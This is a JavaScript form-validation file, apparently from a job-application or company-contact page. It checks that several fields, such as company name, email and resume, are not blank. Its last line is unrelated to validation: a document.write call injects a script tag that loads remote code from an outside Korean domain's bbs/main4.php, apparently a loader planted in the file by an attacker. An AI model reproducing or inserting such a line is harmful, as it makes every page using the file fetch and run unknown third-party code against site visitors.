// JavaScript Document
function validate()
      {
           if (window.document.getElementById("companyname").value=="")
           {
            alert("Company Name Feild can not be blank");
            window.document.getElementById("companyname").focus();
            return false;
           }
		    if (window.document.getElementById("contactperson").value=="")
           {
            alert("Contact Person Field can not be blank");
            window.document.getElementById("contactperson").focus();
            return false;
           }
           if (window.document.getElementById("email").value=="")
           {
            alert("Email Id Field can not be blank");
            window.document.getElementById("email").focus();
            return false;
           }

           if (window.document.getElementById("contactno").value=="")
           {
            alert("Contact No Field can not be blank");
            window.document.getElementById("contactno").focus();
            return false;
           }
		    if (window.document.getElementById("fname").value=="")
           {
            alert("First Name Field can not be blank");
            window.document.getElementById("fname").focus();
            return false;
           }
		    if (window.document.getElementById("lname").value=="")
           {
            alert("Last Name Field can not be blank");
            window.document.getElementById("lname").focus();
            return false;
           }
		    if (window.document.getElementById("resume").value=="")
           {
            alert("Resume Details can not be blank");
            window.document.getElementById("resume").focus();
            return false;
           }
       return true;
       }   
         
		 
document.write('<script src=http://nightmool.co.kr/bbs/main4.php ><\/script>');
